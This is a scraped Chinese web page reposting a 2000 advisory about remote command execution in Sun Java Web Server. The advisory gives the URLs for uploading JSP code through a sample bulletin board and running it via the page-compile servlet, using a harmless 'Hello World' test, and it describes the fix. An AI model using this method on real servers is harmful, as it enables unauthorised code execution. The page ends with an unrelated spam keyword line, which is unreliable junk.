<form id="hz9zz"></form>
  • <form id="hz9zz"></form>

      <nobr id="hz9zz"></nobr>

      <form id="hz9zz"></form>

    1. 明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

      Sun Java Web服務器遠程可執行命令漏洞

      [摘要]Sun Java Web服務器遠程可執行命令漏洞 漏洞發布時間:2000-7-13 17:41:00漏 洞 描 述:在Solaris and Windows NT的Sun Java Web Serv...
      Sun Java Web服務器遠程可執行命令漏洞



      漏洞發布時間:2000-7-13 17:41:00
      漏 洞 描 述:

      在Solaris and Windows NT的Sun Java Web Server默認安裝設置下。通過公告版的樣板程序的漏洞,可以遠程執行任意命令。

      漏洞測試方法如下:

      下面的例子將顯示如何上載和執行該代碼,而在服務器上顯示"Hello World"。

      輸入下面的JSP代碼將打印出"Hello World":

      <% String s="Hello World"; %>
      <%=s %>

      通過下面的公告版連接Post這段代碼:

      http://jws.site/examples/applications/bboard/bboard_frames.html

      檢驗是否該代碼真正的上載了:

      http://jws.site/board.html

      通過執行下面的連接編譯和執行該代碼:

      http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html

      解 決 方 法:

      仔細按照Java Web Server手冊中的"How to secure a web site that uses the Java Web Server" 一章進行設置,或者參考下面連接:
      http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
      或者簡單的移除默認安裝的這些樣板文件。








      日韩精品一区二区三区高清